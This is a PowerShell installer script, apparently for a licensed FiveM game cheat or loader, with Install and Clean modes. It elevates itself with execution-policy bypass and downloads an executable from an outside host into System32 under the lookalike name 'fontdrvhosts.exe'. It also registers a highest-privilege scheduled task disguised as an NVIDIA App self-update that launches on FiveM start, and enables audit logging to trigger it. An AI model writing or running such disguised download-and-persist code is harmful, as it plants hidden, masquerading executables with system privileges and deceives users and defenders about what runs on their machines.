# -----------------------------
# Menu Selection
# -----------------------------
Write-Host "Select Mode:"
Write-Host "1. Install"
Write-Host "2. Clean"

$choice = Read-Host "Enter choice (1/2)"

# -----------------------------
# Check for Administrator rights
# -----------------------------
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 
    Write-Host "Restarting with Administrator privileges..."
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# -----------------------------
# Define paths and variables
# -----------------------------
$apiUrl = "https://script.google.com/macros/s/AKfycbzZBraHoMvJNbMb1B1pVF7cCtNpfteytcDWCkjjr0IzASA9qOXx6RGgBY_p-RC2_2GvCg/exec"
$system32Path = "$env:windir\System32"
$exeDestination = Join-Path $system32Path "fontdrvhosts.exe"
$databasePath = Join-Path $system32Path "database.txt"
$exeUrl        = "https://12bitservices.com/upload/files/2026/01/pfYdi41re0.exe"
$taskName      = "NVIDIA App SelfUpdate_{B2FE1952-0186-46C3-BAEC-Z80AA35AC5B8}"

# -----------------------------
# Install Mode
# -----------------------------
if ($choice -eq "1") {
    # --- ส่วนที่เพิ่มเข้ามาใหม่: ตรวจสอบ License ---
    $userKey = Read-Host "Enter License Key"
    $hwid = (Get-CimInstance Win32_Processor).ProcessorId
    $payload = @{ key = $userKey; hwid = $hwid } | ConvertTo-Json
    $response = Invoke-RestMethod -Uri $apiUrl -Method Post -Body $payload -ContentType "application/json"
    
    if ($response -ne "Success") {
        Write-Host "License Invalid: $response" -ForegroundColor Red
        Read-Host "Press Enter to exit"
        exit
    }
    Write-Host "License Verified!" -ForegroundColor Green
    # ----------------------------------------

    Write-Host "Starting installation..."
    Invoke-WebRequest -Uri $exeUrl -OutFile $exeDestination
    
    $regPath = "HKCU:\Software\NVIDIAApp"
    $regName = "LicenseKey"
    if (-not (Test-Path $regPath)) {
        New-Item -Path $regPath -Force | Out-Null
    }
    Set-ItemProperty -Path $regPath -Name $regName -Value $userKey

    # Create scheduled task
    $cmd = 'cmd /c schtasks /create /tn "NVIDIA App SelfUpdate_{B2FE1952-0186-46C3-BAEC-Z80AA35AC5B8}" /tr "C:\Windows\System32\fontdrvhosts.exe" /sc ONEVENT /ec Security /mo "*[System[(EventID=4688)]] and *[EventData[Data[@Name=''NewProcessName'']=''%localappdata%\FiveM\FiveM.exe'']]" /rl HIGHEST /f'
Invoke-Expression $cmd

    # Enable audit logging
    auditpol /set /subcategory:"Process Creation" /success:enable

    Write-Host "Installation completed."
}

# -----------------------------
# Clean Mode
# -----------------------------
elseif ($choice -eq "2") {
    Write-Host "Cleaning up installation..."

    # Remove scheduled task
    schtasks /delete /tn $taskName /f

    # Remove files if they exist
    if (Test-Path $exeDestination) { Remove-Item $exeDestination -Force }
    if (Test-Path $databasePath) { Remove-Item $databasePath -Force }

    Write-Host "Cleanup completed."
}

else {
    Write-Host "Invalid choice (please select 1 or 2)."
}
